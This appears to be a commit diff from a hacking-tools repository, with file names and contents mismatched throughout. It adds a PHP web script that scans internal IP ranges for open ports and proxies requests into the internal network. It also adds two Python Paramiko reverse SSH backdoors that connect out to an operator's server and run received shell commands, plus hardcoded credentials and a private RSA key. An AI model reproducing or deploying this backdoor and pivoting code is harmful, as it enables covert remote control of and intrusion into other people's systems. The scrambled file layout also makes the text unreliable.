update

Author: xl7dev

Aspx/hec.aspx

@@ -0,0 +1,137 @@
+<?php
+ 
+set_time_limit(0);//设置程序执行时间
+ob_implicit_flush(True);
+ob_end_flush();
+$url = isset($_REQUEST['url'])?$_REQUEST['url']:null; 
+
+/*端口扫描代码*/
+function check_port($ip,$port,$timeout=0.1) {
+ $conn = @fsockopen($ip, $port, $errno, $errstr, $timeout);
+ if ($conn) {
+ fclose($conn);
+ return true;
+ }
+}
+
+ 
+function scanip($ip,$timeout,$portarr){
+foreach($portarr as $port){
+if(check_port($ip,$port,$timeout=0.1)==True){
+echo 'Port: '.$port.' is open<br/>';
+@ob_flush();
+@flush();
+ 
+}
+ 
+}
+}
+
+echo '<html>
+<form action="" method="post">
+<input type="text" name="startip" value="Start IP" />
+<input type="text" name="endip" value="End IP" />
+<input type="text" name="port" value="80,8080,8888,1433,3306" />
+Timeout<input type="text" name="timeout" value="10" /><br/>
+<button type="submit" name="submit">Scan</button>
+</form>
+</html>
+';
+
+if(isset($_POST['startip'])&&isset($_POST['endip'])&&isset($_POST['port'])&&isset($_POST['timeout'])){
+    
+$startip=$_POST['startip'];
+$endip=$_POST['endip'];
+$timeout=$_POST['timeout'];
+$port=$_POST['port'];
+$portarr=explode(',',$port);
+$siparr=explode('.',$startip);
+$eiparr=explode('.',$endip);
+$ciparr=$siparr;
+if(count($ciparr)!=4||$siparr[0]!=$eiparr[0]||$siparr[1]!=$eiparr[1]){
+exit('IP error: Wrong IP address or Trying to scan class A address');
+}
+if($startip==$endip){
+echo 'Scanning IP '.$startip.'<br/>';
+@ob_flush();
+@flush();
+scanip($startip,$timeout,$portarr);
+@ob_flush();
+@flush();
+exit();
+}
+ 
+if($eiparr[3]!=255){
+$eiparr[3]+=1;
+}
+while($ciparr!=$eiparr){
+$ip=$ciparr[0].'.'.$ciparr[1].'.'.$ciparr[2].'.'.$ciparr[3];
+echo '<br/>Scanning IP '.$ip.'<br/>';
+@ob_flush();
+@flush();
+scanip($ip,$timeout,$portarr);
+$ciparr[3]+=1;
+ 
+if($ciparr[3]>255){
+$ciparr[2]+=1;
+$ciparr[3]=0;
+}
+if($ciparr[2]>255){
+$ciparr[1]+=1;
+$ciparr[2]=0;
+}
+}
+}
+
+/*内网代理代码*/
+
+function getHtmlContext($url){ 
+    $ch = curl_init(); 
+    curl_setopt($ch, CURLOPT_URL, $url); 
+    curl_setopt($ch, CURLOPT_HEADER, TRUE);    //表示需要response header 
+    curl_setopt($ch, CURLOPT_NOBODY, FALSE); //表示需要response body 
+    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); 
+    curl_setopt($ch, CURLOPT_TIMEOUT, 120); 
+    $result = curl_exec($ch); 
+  global $header; 
+  if($result){ 
+       $headerSize = curl_getinfo($ch, CURLINFO_HEADER_SIZE); 
+       $header = explode("\r\n",substr($result, 0, $headerSize)); 
+       $body = substr($result, $headerSize); 
+  } 
+    if (curl_getinfo($ch, CURLINFO_HTTP_CODE) == '200') { 
+        return $body; 
+    } 
+    if (curl_getinfo($ch, CURLINFO_HTTP_CODE) == '302') { 
+    $location = getHeader("Location"); 
+    if(strpos(getHeader("Location"),'http://') == false){ 
+      $location = getHost($url).$location; 
+    } 
+        return getHtmlContext($location); 
+    } 
+    return NULL; 
+} 
+
+function getHost($url){ 
+    preg_match("/^(http:\/\/)?([^\/]+)/i",$url, $matches); 
+    return $matches[0]; 
+} 
+function getCss($host,$html){ 
+    preg_match_all("/<link[\s\S]*?href=['\"](.*?[.]css.*?)[\"'][\s\S]*?>/i",$html, $matches); 
+    foreach($matches[1] as $v){ 
+    $cssurl = $v; 
+        if(strpos($v,'http://') == false){ 
+      $cssurl = $host."/".$v; 
+    } 
+    $csshtml = "<style>".file_get_contents($cssurl)."</style>"; 
+    $html .= $csshtml; 
+  } 
+  return $html; 
+} 
+
+if($url != null){ 
+
+    $host = getHost($url); 
+    echo getCss($host,getHtmlContext($url)); 
+}
+?>

Php/scanner.php

@@ -0,0 +1,3 @@
+This is derived from InfosecInstitute.
+Requires Paramiko Lib at both Ends. 
+More Information Here: http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/

SSH/ReverseSSH-Backdoor/Readme.txt

@@ -0,0 +1,17 @@
+import paramiko
+import threading
+import subprocess
+
+client = paramiko.SSHClient()
+client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+client.connect('*insertServerIPHere*', username='root', password='toor')
+chan = client.get_transport().open_session()
+chan.send('Hey i am connected :) ')
+print chan.recv(1024)
+command = chan.recv(1024)
+try:
+	CMD = subprocess.check_output(command, shell=True)
+        chan.send(CMD)
+except Exception,e:
+        chan.send(str(e))
+client.close

SSH/ReverseSSH-Backdoor/revsshclient.py

@@ -0,0 +1,60 @@
+import socket
+import paramiko
+import threading
+import sys
+
+host_key = paramiko.RSAKey(filename='/usr/share/doc/python-paramiko/examples/test_rsa.key')
+
+class Server (paramiko.ServerInterface):
+   def _init_(self):
+       self.event = threading.Event()
+   def check_channel_request(self, kind, chanid):
+       if kind == 'session':
+           return paramiko.OPEN_SUCCEEDED
+       return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
+   def check_auth_password(self, username, password):
+       if (username == 'root') and (password == 'toor'):
+           return paramiko.AUTH_SUCCESSFUL
+       return paramiko.AUTH_FAILED
+
+try:
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+    sock.bind(('*insertClientIPHere*', 22))
+    sock.listen(100)
+    print '[+] Listening for connection ...'
+    client, addr = sock.accept()
+except Exception, e:
+    print '[-] Listen/bind/accept failed: ' + str(e)
+    sys.exit(1)
+print '[+] Got a connection!'
+
+try:
+    t = paramiko.Transport(client)
+    try:
+        t.load_server_moduli()
+    except:
+        print '[-] (Failed to load moduli -- gex will be unsupported.)'
+        raise
+    t.add_server_key(host_key)
+    server = Server()
+    try:
+        t.start_server(server=server)
+    except paramiko.SSHException, x:
+        print '[-] SSH negotiation failed.'
+
+    chan = t.accept(20)
+    print '[+] Authenticated!'
+    print chan.recv(1024)
+    chan.send('Yeah i can see this')
+    command= raw_input("Enter command: ").strip('\n')
+    chan.send(command)
+    print chan.recv(1024) + '\n'
+
+except Exception, e:
+    print '[-] Caught exception: '': ' + str(e)
+    try:
+        t.close()
+    except:
+        pass
+    sys.exit(1)

SSH/ReverseSSH-Backdoor/revsshserver.py

@@ -0,0 +1,5 @@
+SSH Backdoor using Paramiko
+
+Example:
+
+![](print.png)

SSH/custom-ssh-backdoor/README.md

@@ -0,0 +1,18 @@
+import paramiko
+import threading
+import subprocess
+
+client = paramiko.SSHClient()
+client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+client.connect('192.168.1.100', username='joridos', password='olh234')
+chan = client.get_transport().open_session()
+chan.send('Hey i am connected :) ')
+while True:
+    command = chan.recv(1024)
+    try:
+        CMD = subprocess.check_output(command, shell=True)
+        chan.send(CMD)
+    except Exception,e:
+        chan.send(str(e))
+print chan.recv(1024)
+client.close

SSH/custom-ssh-backdoor/client.py

@@ -0,0 +1,60 @@
+import socket
+import paramiko
+import threading
+import sys
+
+host_key = paramiko.RSAKey(filename='/home/joridos/custom-ssh-backdoor/test_rsa.key')
+
+class Server (paramiko.ServerInterface):
+   def _init_(self):
+       self.event = threading.Event()
+   def check_channel_request(self, kind, chanid):
+       if kind == 'session':
+           return paramiko.OPEN_SUCCEEDED
+       return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
+   def check_auth_password(self, username, password):
+       if (username == 'joridos') and (password == 'olh234'):
+           return paramiko.AUTH_SUCCESSFUL
+       return paramiko.AUTH_FAILED
+
+try:
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+    sock.bind(('192.168.1.100', 22))
+    sock.listen(100)
+    print '[+] Listening for connection ...'
+    client, addr = sock.accept()
+except Exception, e:
+    print '[-] Listen/bind/accept failed: ' + str(e)
+    sys.exit(1)
+print '[+] Got a connection!'
+
+try:
+    t = paramiko.Transport(client)
+    try:
+        t.load_server_moduli()
+    except:
+        print '[-] (Failed to load moduli -- gex will be unsupported.)'
+        raise
+    t.add_server_key(host_key)
+    server = Server()
+    try:
+        t.start_server(server=server)
+    except paramiko.SSHException, x:
+        print '[-] SSH negotiation failed.'
+
+    chan = t.accept(20)
+    print '[+] Authenticated!'
+    print chan.recv(1024)
+    while True:
+        command= raw_input("Enter command: ").strip('n')
+        chan.send(command)
+        print chan.recv(1024) + 'n'
+
+except Exception, e:
+    print '[-] Caught exception: ' + str(e) + ': ' + str(e)
+    try:
+        t.close()
+    except:
+        pass
+    sys.exit(1)

SSH/custom-ssh-backdoor/print.png

@@ -0,0 +1,15 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIICWgIBAAKBgQDTj1bqB4WmayWNPB+8jVSYpZYk80Ujvj680pOTh2bORBjbIAyz
+oWGW+GUjzKxTiiPvVmxFgx5wdsFvF03v34lEVVhMpouqPAYQ15N37K/ir5XY+9m/
+d8ufMCkjeXsQkKqFbAlQcnWMCRnOoPHS3I4vi6hmnDDeeYTSRvfLbW0fhwIBIwKB
+gBIiOqZYaoqbeD9OS9z2K9KR2atlTxGxOJPXiP4ESqP3NVScWNwyZ3NXHpyrJLa0
+EbVtzsQhLn6rF+TzXnOlcipFvjsem3iYzCpuChfGQ6SovTcOjHV9z+hnpXvQ/fon
+soVRZY65wKnF7IAoUwTmJS9opqgrN6kRgCd3DASAMd1bAkEA96SBVWFt/fJBNJ9H
+tYnBKZGw0VeHOYmVYbvMSstssn8un+pQpUm9vlG/bp7Oxd/m+b9KWEh2xPfv6zqU
+avNwHwJBANqzGZa/EpzF4J8pGti7oIAPUIDGMtfIcmqNXVMckrmzQ2vTfqtkEZsA
+4rE1IERRyiJQx6EJsz21wJmGV9WJQ5kCQQDwkS0uXqVdFzgHO6S++tjmjYcxwr3g
+H0CoFYSgbddOT6miqRskOQF3DZVkJT3kyuBgU2zKygz52ukQZMqxCb1fAkASvuTv
+qfpH87Qq5kQhNKdbbwbmd2NxlNabazPijWuphGTdW0VfJdWfklyS2Kr+iqrs/5wV
+HhathJt636Eg7oIjAkA8ht3MQ+XSl9yIJIS8gVpbPxSw5OMfw0PjVE7tBdQruiSc
+nvuQES5C9BMHjF39LZiGH1iLQy7FgdHyoP+eodI7
+-----END RSA PRIVATE KEY-----